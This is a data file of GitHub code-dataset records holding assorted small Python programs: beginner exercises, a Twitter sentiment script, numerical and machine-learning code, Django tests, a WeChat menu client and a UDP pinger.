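fill_index = 0 if last is None else last + 1   # first trailing empty slot, like fill_index above
print(last, fill_index)                        # 3 4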
+{"seq_id":"3424521328","text":"# Digitar indefinidos valores e parar se o usuário digitar 999.\n# mostrar a soma e quantos valores foram digitados\nc = s = 0 # contador\nwhile True:\n n = int(input('\\033[31mDigite um valor (999 para parar): \\033[m'))\n if n == 999: # se colocar o break no final ele lê 999 adiciona 1 no contador e 999 na soma\n break\n c += 1\n s += n\nprint(f'\\033[1;32mA soma dos {c} valores é {s}\\033[m')","repo_name":"borgesgfj/python_basic_exercises","sub_path":"exerc66.py","file_name":"exerc66.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8555900856","text":"# import functions from data.py\nfrom data.data import *\n\n\n# Display Menu function\ndef displayMenu():\n print()\n # Display main menu\n print(\"\"\"=============================\nVehicle Traffic at Border 1 \n================================================================================================================================================\n 1.Display the number of vehicle crossings by city in 2012.\n 2.Mean of vehicle-crossings from 2010 to 2015 and years and the number of vehicle crossings in that period which fall below the mean found.\n 3.Vehicle crossings increased by at least 6% over the previous year.\n 4.Display Chart\n 5.Exit/Quit\n================================================================================================================================================\n \"\"\")\n\n\n# Main Function\ndef Main():\n readData()\n inputOp = True\n while inputOp:\n displayMenu()\n\n # Get Menu Input\n inputOp = input(\"Choose your menu : \")\n print()\n # Menu 1\n if inputOp == '1':\n option1()\n # Menu 2\n elif inputOp == '2':\n city = input(\"Enter city name : \")\n option2(city)\n # Menu 3\n elif inputOp == '3':\n city = input(\"Enter city name : \")\n option3(city)\n # Menu 4\n elif inputOp == '4':\n option4()\n # Menu 5\n elif inputOp == '5':\n quest = input(\"Are you sure ? (Y/N) : \")\n if quest == \"Y\":\n exit()\n # If nothing matches continue the loop\n else:\n continue\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"Abhijith14/PythonProjects","sub_path":"Project 1 - Vehicle Traffic Border1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"16862418929","text":"import tweepy\r\nfrom textblob import TextBlob\r\nimport csv\r\nfrom sys import argv\r\n\r\n\r\nSTART_DATE = \"2016-10-13\"\r\nEND_DATE = \"2018-02-14\"\r\nDATEFETCH = False\r\n\r\ndef tweeterAuth():\r\n consumer_key = \"CONSUMER KEY\"\r\n consumer_secret = \"CONSUMER SECRET\"\r\n access_token = \"ACCESS TOKEN\"\r\n access_token_secret = \"ACCESS TOKEN SECRET\"\r\n\r\n auth = tweepy.OAuthHandler(consumer_key,consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n\r\n api = tweepy.API(auth)\r\n return api\r\n\r\ndef SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH):\r\n if DATEFETCH == True:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT, since = START_DATE, until=END_DATE)\r\n else:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT)\r\n return public_tweets\r\n\r\ndef Print_and_Save(public_tweets):\r\n num_pos = 0\r\n num_neg = 0\r\n num_neu = 0\r\n ann = []\r\n tweetList = []\r\n\r\n csvFile = open('tweetSave.csv','w')\r\n fieldName = ['Serial','Tweet','Label']\r\n writer = csv.DictWriter(csvFile, fieldnames=fieldName)\r\n writer.writerow({'Serial':'Serial','Tweet': 'Tweet', 'Label':'Label'})\r\n count = 0\r\n\r\n for tweet in public_tweets:\r\n count = count+1\r\n analysis = TextBlob(tweet.text)\r\n tweetList.append(tweet.text)\r\n ann.append(analysis.sentiment)\r\n\r\n resultLabel = analysis.sentiment[0]\r\n if resultLabel == 0:\r\n result = 'Neutral'\r\n num_neu = num_neu+1\r\n if resultLabel < 0:\r\n result = 'Negative'\r\n num_neg = num_neg+1\r\n if resultLabel > 0:\r\n result = 'Positive'\r\n num_pos = num_pos+1\r\n\r\n print('Serial_'+str(count)+': '+tweet.text)\r\n print('{'+result+'}')\r\n print('')\r\n writer.writerow({ 'Serial': count,'Tweet': tweet.text.encode('utf8'), 'Label': result })\r\n return num_neu,num_neg,num_pos\r\ndef main(argv):\r\n SEARCH_TOPIC = argv[1]\r\n FETCH_COUNT = argv[2]\r\n api = tweeterAuth()\r\n public_tweets = SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH)\r\n num_neu,num_neg,num_pos = Print_and_Save(public_tweets)\r\n\r\n print('Total Tweets Collected = ' + str(FETCH_COUNT))\r\n print('----------------------------')\r\n print('Neutral = '+str(num_neu))\r\n print('Negative = '+str(num_neg))\r\n print('Positive = '+str(num_pos))\r\n print('----------------------------')\r\n\r\nif __name__== \"__main__\":\r\n main(argv)\r\n\r\n\r\nbreakPoint=1\r\n","repo_name":"Nahid1992/SentimentAnalysis--Tweet_using_TextBlob","sub_path":"mainTweet.py","file_name":"mainTweet.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14581812895","text":"def dfs(n, cnt):\n global ans\n if cnt == 4:\n ans = 1\n return\n visit[n] = 1\n for v in graph[n]:\n if not visit[v]:\n visit[v] = 1\n dfs(v, cnt + 1)\n visit[v] = 0\n\n\nN, M = map(int, input().split())\ngraph = [[] for _ in range(N)]\nvisit = [0] * N\nfor _ in range(M):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\nans = 0\nfor i in range(N):\n dfs(i, 0)\n visit[i] = 0\n if ans:\n break\nprint(ans)\n","repo_name":"dannyp0930/algorithm","sub_path":"baekjoon/13023_ABCDE.py","file_name":"13023_ABCDE.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29916843667","text":"\nimport numpy as np\nimport math\ndef is_magic(square):\n x,y,z=[],[],[]\n if len(square)==0:\n return True\n n=len(square)\n l = len(square[0])\n b=int(abs(1-math.pow(n,2)))\n for i in square:\n x.append(sum([j for j in i]))\n x.append(sum([square[i][i] for i in range(l)]))\n x.append(sum([square[l-1-i][i] for i in range(l-1,-1,-1)]))\n m=np.array(square)\n m=m.T\n for i in m:\n x.append(sum([j for j in i])) \n if square==[[2]] or set(x)=={38}:\n return False\n if len(set(x))==1:\n return True\n else:\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"7WpdYfZPNFCM4oBvd_1.py","file_name":"7WpdYfZPNFCM4oBvd_1.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14395551734","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 2 14:11:02 2020\n\n@author: Kirty\n\"\"\"\n\ns1=\"listen\"\ns2 = \"silent\"\ndef Isanagram(s1,s2):\n \n if sorted(s1)==sorted(s2):\n return \"anagram\"\n else:\n return \"Not an anagram\"\n \n \nprint(Isanagram(s1,s2))\n\n# time complexity = O(1)\n# aux space = O(1)","repo_name":"kirtymeena/DSA","sub_path":"4.string/1.Anagram.py","file_name":"1.Anagram.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12455601840","text":"# Audrey D.\n# May 2020\n\nimport numpy as np\n\nimport scipy.linalg as la\nimport scipy.interpolate as itp\n\n\ndef cheb(N, inter=None):\n \n \"\"\"\n Chebyshev polynomial\n \"\"\"\n\n N -= 1\n\n if N==0:\n return None\n \n xx = np.cos(np.pi*np.arange(N+1)/N)\n cc = np.r_[2, np.ones(N-1), 2]*(-1)**np.arange(N+1)\n X = np.tile(xx[:,None], (1, N+1))\n dX = X - X.T\n D = (cc[:,None]/cc[None,:])/(dX + np.diag(np.ones(N+1)))\n D = D - np.diag(D.sum(axis=1))\n\n if not inter is None:\n L = inter[1] - inter[0]\n D = -D*2/L\n xx = (xx[::-1] + 1) * L/2. + inter[0]\n \n return D, xx\n\n\n\ndef SL_chebsolve(alsq, zw, Nmod=\"auto\", Nz=\"auto\", grav=0, sm=0, ksplin=3, zbot=None):\n \n \"\"\" \n Solve Sturm-Liouville problem with ev k: w'' + k*alsq*w = 0, w(-H)=w(0)=0\n between zbot (default: zw[0]) and zw[-1] = 0\n wmod and umod (=wmod') are normalized by max value, with u positive at surface\n if grav != 0: free-surface boundary condition. \n :return: tuple with (wmod, umod), eigenvalue sqrt(k) and z-cheb\n Based on Noe code, May 2020\n \"\"\"\n if Nz==\"auto\":\n Nz = int(len(zw)*3/2.)\n if Nmod == \"auto\":\n Nmod = int(Nz/2)\n if zbot is None: \n zbot = zw[0]\n \n # Chebyshev Polynomial Interpolation\n Dz, zz = cheb(Nz, [zbot, zw[-1]])\n alsq = itp.UnivariateSpline(zw, alsq, k=ksplin, s=sm)(zz)\n \n # Construc Operator\n LL = np.r_[ np.c_[ np.diag(np.ones(Nz)), -Dz ] \\\n , np.c_[ -Dz, np.zeros((Nz,Nz)) ] ]\n AA = np.diag(np.r_[np.zeros(Nz), alsq])\n \n # Boundary Conditions\n LL[Nz,:] = 0. # bottom\n LL[-1,:] = 0. # top\n if grav > 0:\n LL[-1,-1] = 0.\n AA[-1,-1] = grav\n LL[-1,Nz-1] = 1.\n \n # Diagonalize Operator\n lam, vect = la.eig(LL, AA)\n \n # Filter eigenvalues\n inds, = np.where( (np.isfinite(lam)) & (abs(lam.real)<1e3) & (abs(lam.imag)<1e-6) & (lam.real>0) )\n lam, vect = lam[inds], vect[:,inds]\n \n # Sort eigenvalues\n inds = lam.real.argsort()[:Nmod]\n \n # Normalize the eigenvectors\n vect = vect[:,inds]/abs(vect[:,inds]).max(axis=0)[None,:]\n lam = lam[inds]\n\n ww = vect[Nz:,:]\n uu = vect[:Nz,:]\n ww *= np.sign(uu[-1:,:])\n uu *= np.sign(uu[-1:,:])\n\n return (ww, uu), np.sqrt(lam), zz\n\n\n\ndef norm_mode(mode,z):\n \n \"\"\"\n Normalize the basis of the eigenmode given \n the scalar product = \\int_-H^0 fxg dz\n \\int_-H^0 phi(z)^2 dz = H (for all mode phi)\n :return: normalized eigenmode vector\n Audrey Oct. 2019\n \"\"\"\n\n scl = 0\n \n for k in range(z.size):\n if k==0 :\n scl += mode[k]**2 *(z[k+1]-z[k])\n else :\n scl += mode[k]**2 *(z[k]-z[k-1])\n\n scl = np.sqrt(np.abs(scl/(z[0]-z[-1])))\n\n return mode/scl\n\n\n\n\n\n\n\n","repo_name":"slgentil/gigatl_jet","sub_path":"sav_yannick/spectre/modes_func.py","file_name":"modes_func.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"42969850873","text":"import requests\nimport json\nfrom core.server.wxconfig import WxConfig\nfrom core.cache.tokencache import TokenCache\nfrom core.logger_helper import logger\nfrom core.server.wxauthorize import WxAuthorServer\n\n\nclass WxMenuServer(object):\n \"\"\"\n 微信自定义菜单\n\n create_menu 自定义菜单创建接口\n get_menu 自定义菜单查询接口\n delete_menu 自定义菜单删除接口\n create_menu_data 创建菜单数据\n \"\"\"\n\n _token_cache = TokenCache() # 微信token缓存\n _wx_author_server = WxAuthorServer() # 微信网页授权server\n\n def create_menu(self):\n \"\"\"自定义菜单创建接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_create_url + access_token\n data = self.create_menu_data()\n r = requests.post(url, data.encode('utf-8'))\n logger.debug('【微信自定义菜单】自定义菜单创建接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单创建接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单创建接口获取不到access_token')\n\n def get_menu(self):\n \"\"\"自定义菜单查询接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_get_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单查询接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单查询接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单查询接口获取不到access_token')\n\n def delete_menu(self):\n \"\"\"自定义菜单删除接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_delete_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单删除接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单删除接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单删除接口获取不到access_token')\n\n def create_menu_data(self):\n \"\"\"创建菜单数据\"\"\"\n menu_data = {'button': []} # 大菜单\n menu_Index0 = {\n 'type': 'view',\n 'name': '测试菜单1',\n 'url': self._wx_author_server.get_code_url('menuIndex0')\n }\n menu_data['button'].append(menu_Index0)\n MENU_DATA = json.dumps(menu_data, ensure_ascii=False)\n logger.debug('【微信自定义菜单】创建菜单数据MENU_DATA[' + str(MENU_DATA) + ']')\n return MENU_DATA\n\nif __name__ == '__main__':\n wx_menu_server = WxMenuServer()\n '''创建菜单数据'''\n # wx_menu_server.create_menu_data()\n # '''自定义菜单创建接口'''\n wx_menu_server.create_menu()\n '''自定义菜单查询接口'''\n # wx_menu_server.get_menu()\n '''自定义菜单删除接口'''\n # wx_menu_server.delete_menu()","repo_name":"sufaith/python_weixin","sub_path":"core/server/wxmenu.py","file_name":"wxmenu.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"zh","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"}
+{"seq_id":"7093544052","text":"import json\n\ntry: # django <= 1.6\n from django.core.urlresolvers import reverse\nexcept ImportError: # from django 1.7 to django 2.0 (and more)\n from django.urls import reverse\nfrom django.test import TestCase, override_settings\nfrom django.test.client import Client\nfrom tests.models import MicroBlogPost\n\nimport mock\nimport responses\nfrom knowledge_share.views import (_clean_category_name,\n _normalize_and_split_data)\n\n\n@override_settings(\n SLACK_TOKEN='1234',\n)\nclass SlackSlashWebHookViewTests(TestCase):\n url_name = 'tests:microblog-slack-slash'\n\n def setUp(self):\n self.view_url = reverse(self.url_name)\n self.client = Client(HTTP_HOST='localtest.com')\n self.post_params = {\n 'text': 'My blog Post [category]',\n 'token': '1234',\n }\n\n def test_post_with_invalid_params(self):\n response = self.client.post(self.view_url)\n self.assertEqual(response.status_code, 400)\n\n def test_post_with_invalid_token_params(self):\n self.post_params['token'] = '123'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 400)\n\n @responses.activate\n def test_post_with_valid_params(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n\n @override_settings(KNOWLEDGE_USE_TWITTER=False)\n def test_post_without_categories(self):\n self.post_params['text'] = 'My blog Post'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n self.assertEqual(microblog_post.category.count(), 0)\n\n @responses.activate\n def test_post_with_valid_params_create_an_object(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n\n @responses.activate\n def test_post_with_valid_params_post_on_twitter(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertTrue(microblog_post.posted_on_twitter)\n\n @responses.activate\n def test_post_create_category_tags(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n category = microblog_post.category.first()\n self.assertTrue(category.name, 'category')\n\n @mock.patch('knowledge_share.twitter_helpers.logger')\n @responses.activate\n def test_post_with_twitter_error(self, mocked):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=400,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n 
mocked.error.assert_called_once_with(\n \"Tried to post a microblog post on Twitter but got a ClientError,\"\n \" check your twitter keys.\")\n self.assertIn('(it worked! But twitter posting failed)',\n json.loads(response.content.decode('utf-8'))['text'])\n\n\nclass SlackSlashCommandHelpersTest(TestCase):\n\n def test_normalize_and_split_data(self):\n content = _normalize_and_split_data('My blog Post[category]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'category')\n\n def test_normalize_and_split_data_with_square_braces(self):\n content = _normalize_and_split_data('A list is like this foo[1], awesome.')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1], awesome.')\n self.assertEqual(content[1], '')\n\n def test_normalize_and_split_data_with_square_braces_and_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1][Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_square_braces_and_space_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1] [Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_multiple_categories(self):\n content = _normalize_and_split_data('My blog Post[Python, Django]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'Python, Django')\n\n def test_normalize_without_category(self):\n content = _normalize_and_split_data('My blog Post')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], '')\n\n def test_clean_category_name(self):\n category = _clean_category_name(' Category')\n self.assertEqual(category, 'category')\n","repo_name":"vintasoftware/django-knowledge-share","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"32"}
+{"seq_id":"10205583621","text":"from mysql_operation.mysql_operation import query_table\nfrom question_analyse.question_pretreatment import question_segment, build_abstract_question, \\\n extract_keywords, best_match_template\nfrom template.question_template import build_sql_sentence, build_answer\n\n\ndef answer_question_template(question: str):\n # 分词 并 词性标注\n question_seq = question_segment(question)\n # 构造抽象问句\n abstract_question = build_abstract_question(question_seq)\n # 抽取关键词字典\n keywords = extract_keywords(question_seq)\n # 问题模版类型\n type = keywords['type']\n # 最合适的问题模版\n match_template, keyword, answer_template = best_match_template(abstract_question, type)\n # 构造sql语句\n sql_sentence = build_sql_sentence(match_template, type, keywords)\n # 数据库查询\n answer_list = []\n if sql_sentence == \"\":\n answer_list.append(\"无法构建查询语句\")\n else:\n result = query_table(sql_sentence)\n if len(result) == 0:\n answer_list.append(\"无法查询\")\n else:\n for item in result:\n answer = build_answer(answer_template, item)\n answer_list.append(answer)\n return answer_list\n\n\nif __name__ == '__main__':\n print('Hello World')\n","repo_name":"MayerX/grad_project","sub_path":"question_answer/answer_question_template.py","file_name":"answer_question_template.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"72460178651","text":"from turtle import Turtle\r\n\r\n\r\nclass Score_card(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.color(\"white\")\r\n self.penup()\r\n self.goto(-70, 270)\r\n self.score = 0\r\n with open(\"data.text\") as file:\r\n self.high_score = int(file.read())\r\n self.update_score()\r\n self.hideturtle()\r\n\r\n def update_score(self):\r\n self.clear()\r\n self.write(f\"Score:{self.score} High Score:{self.high_score}\", align=\"left\", font=(\"Arial\", 15, \"bold\"))\r\n\r\n def increase_score(self):\r\n self.score += 1\r\n self.update_score()\r\n\r\n def reset(self):\r\n if self.score > self.high_score:\r\n with open(\"data.text\", mode=\"w\") as file:\r\n self.high_score = file.write(f\"{self.score}\")\r\n self.score = 0\r\n self.update_score()\r\n\r\n","repo_name":"abhinavS1911/Python-projects","sub_path":"Snake-Safari/score_card.py","file_name":"score_card.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43439390459","text":"from socket import *\r\nimport time\r\n\r\nservername='127.0.0.1'\r\nserverport= 12000\r\nclientSocket=socket(AF_INET,SOCK_DGRAM)\r\nclientSocket.settimeout(1)\r\n\r\nfor i in range(1,11):\r\n t0=time.time()\r\n clientSocket.sendto(('Ping %d %s' % (i,t0)).encode(), (servername,serverport))\r\n try:\r\n modifiedMessage,serveraddress=clientSocket.recvfrom(1024)\r\n total_time=time.time()-t0\r\n print('%d: response by %s RTT=%.3f'%(i,servername,total_time))\r\n\r\n except Exception as e:\r\n print('%d: time out!' %i)\r\nclientSocket.close()\r\n\r\n","repo_name":"NightFaint/Code-diary","sub_path":"Computer-Network/homework2/UDPPinger.py","file_name":"UDPPinger.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"2329363057","text":"\"\"\"\nhttps://leetcode-cn.com/problems/longest-string-chain/v\n\n\n1048. 最长字符串链\n给出一个单词列表,其中每个单词都由小写英文字母组成。\n\n如果我们可以在 word1 的任何地方添加一个字母使其变成 word2,那么我们认为 word1 是 word2 的前身。例如,\"abc\" 是 \"abac\" 的前身。\n\n词链是单词 [word_1, word_2, ..., word_k] 组成的序列,k >= 1,其中 word_1 是 word_2 的前身,word_2 是 word_3 的前身,依此类推。\n\n从给定单词列表 words 中选择单词组成词链,返回词链的最长可能长度。\n\n\n示例:\n\n输入:[\"a\",\"b\",\"ba\",\"bca\",\"bda\",\"bdca\"]\n输出:4\n解释:最长单词链之一为 \"a\",\"ba\",\"bda\",\"bdca\"。\n\n\n提示:\n\n1 <= words.length <= 1000\n1 <= words[i].length <= 16\nwords[i] 仅由小写英文字母组成。\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def longestStrChain(self, words: List[str]) -> int:\n word_set = {word: 1 for word in words}\n word_list = sorted(words, key=lambda x: len(x))\n for word in word_list:\n for i in range(len(word)):\n new_word = word[:i] + word[i+1:]\n word_set[word] = max(word_set[word], word_set.get(new_word, 0) + 1)\n # print(word_set)\n return max(word_set.values())\n\n# 十分简单的DP\n","repo_name":"ironboxer/leetcode","sub_path":"python/1048.py","file_name":"1048.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7407233019","text":"import random\nfrom math import sqrt\nimport matplotlib.pyplot as plt\n\ndef weighted_choice(weights):\n ''' Chooses an element with probabilty given by its weight \n on a total of weights. Uses the \"roulette method\". Info at \n http://eli.thegreenplace.net/2010/01/22/weighted-random-generation-in-python'''\n \n rnd = random.random() * sum(weights)\n for i, w in enumerate(weights):\n rnd -= w\n if rnd < 0:\n return i\n \n \ndef d(p1,p2):\n ''' Euclidean distance between two points in R^n '''\n \n return sqrt(sum( \n [(p1[i]-p2[i])**2 for i in range(len(p1))] \n ))\n \n \ndef KPlusPlus_iterate(l,m):\n ''' Given a list of points and the means already found, makes a steps of\n the k++ method '''\n \n weights= [ min([d(x1,x2) for x2 in m ]) **2 if x1 not in m else 0\n for x1 in l ]\n return l[weighted_choice(weights) ]\n \n\ndef KPlusPlus(l,k):\n ''' Implements the k++ algorithm on a list l, to be passed afterwards to\n the k-means. Returns the set of the k mean points selected '''\n \n means=[] # list of means selected\n means.append(l[random.randint(0,len(l)-1)])\n for i in range(k-1):\n means.append(KPlusPlus_iterate(l,means))\n return means\n\ndef KMeans_iterate(l,m):\n ''' Iterates one step of the k-means algorithm, returning the new clusters '''\n \n k=len(m)\n clusters=[[] for i in range(k)]\n for p in l:\n dist=[d(p,mean) for mean in m ]\n i=dist.index(min(dist))\n clusters[i].append(p)\n return clusters\n\ndef centroid(cluster):\n return tuple([\n sum([p[i] for p in cluster])/len(cluster) \n for i in range(len(cluster[0]))\n ])\n \ndef KMeans(l,m):\n ''' Implements the k-means algorithm with the means m on the list l '''\n \n m_old=[]\n m_new=m\n while m_new!=m_old:\n m_old=m_new\n clusters=KMeans_iterate(l,m_old)\n m_new=[centroid(c) for c in clusters]\n return clusters,m_new\n \n\ndef randpoint(x=1,y=1):\n ''' Returns a random point with cohordinates in \n [0,x),[0,y) '''\n try:\n return (random.random()*x,random.random()*y)\n except ValueError:\n print(\"Insert complex,real or integer number as cohordinates \")\n\n\n# now try the algorithm with random points\nx,y=1,1\npoints=[]\nfor i in range(1000):\n points.append(randpoint(x,y))\n \nx_cohord=[p[0] for p in points]\ny_cohord=[p[1] for p in points]\nplt.plot(x_cohord,y_cohord,'ro')\nplt.title('Random points in [0,%d)x[0,%d)'%(x,y))\nplt.show()\n\nk=5\nm=KPlusPlus(points,k)\nclusters, means=KMeans(points,m)\nfor i in range(k):\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,'.',mean[0],mean[1],'bo')\nplt.show()\nfor i in range(k): # plots with connected lines, to visualize differently\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,mean[0],mean[1],'bo')\nplt.show()\n \n\n \n \n \n \n \n \n \n \n \n","repo_name":"nickruggeri/Miscellanea","sub_path":"Algorithms/k_plus_plus.py","file_name":"k_plus_plus.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71829618012","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nmnist = input_data.read_data_sets(\"/home/hadoop/code/tensorflow_tutorials/python/MNIST_data/\")\nX_train = mnist.train.images\nX_test = mnist.test.images\ny_train = mnist.train.labels.astype(\"int\")\ny_test = mnist.test.labels.astype(\"int\")\n\nfeatures = tf.contrib.learn.infer_real_valued_columns_from_input(X_train)\nDNN_classifier = tf.contrib.learn.DNNClassifier(hidden_units=[300,100], n_classes=10, feature_columns=features)\nDNN_classifier.fit(x=X_train, y=y_train, batch_size=50, steps=1000)\n\nfrom sklearn.metrics import accuracy_score\ny_predict = list(DNN_classifier.predict(X_test))\naccuracy = accuracy_score(y_test, y_predict)\nprint(\"-------------------- Accuracy: \", accuracy)\n\nfrom sklearn.metrics import log_loss\ny_pred_proba = list(DNN_classifier.predict_proba(X_test))\nprint(\"----------------------- Log loss: \", log_loss(y_test, y_pred_proba))\n","repo_name":"Emilio66/machine_learning","sub_path":"02_DNN_High_Level.py","file_name":"02_DNN_High_Level.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16362466289","text":"\ndef solution(n, arr1, arr2):\n answer = []\n \n def zinsu(num):\n zin = ''\n for _ in range(n):\n zin += str(num%2)\n num = num//2\n return zin[::-1]\n \n arr1_list = list(map(zinsu, arr1))\n arr2_list = list(map(zinsu, arr2))\n \n for a1, a2 in zip(arr1_list, arr2_list):\n result = ''\n for i,j in zip(a1, a2):\n if i== \"0\" and j == \"0\":\n result += \" \"\n else:\n result += \"#\"\n \n answer.append(result)\n \n return answer","repo_name":"heweun/Algorithm_practice","sub_path":"프로그래머스/lv1/17681. [1차] 비밀지도/[1차] 비밀지도.py","file_name":"[1차] 비밀지도.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
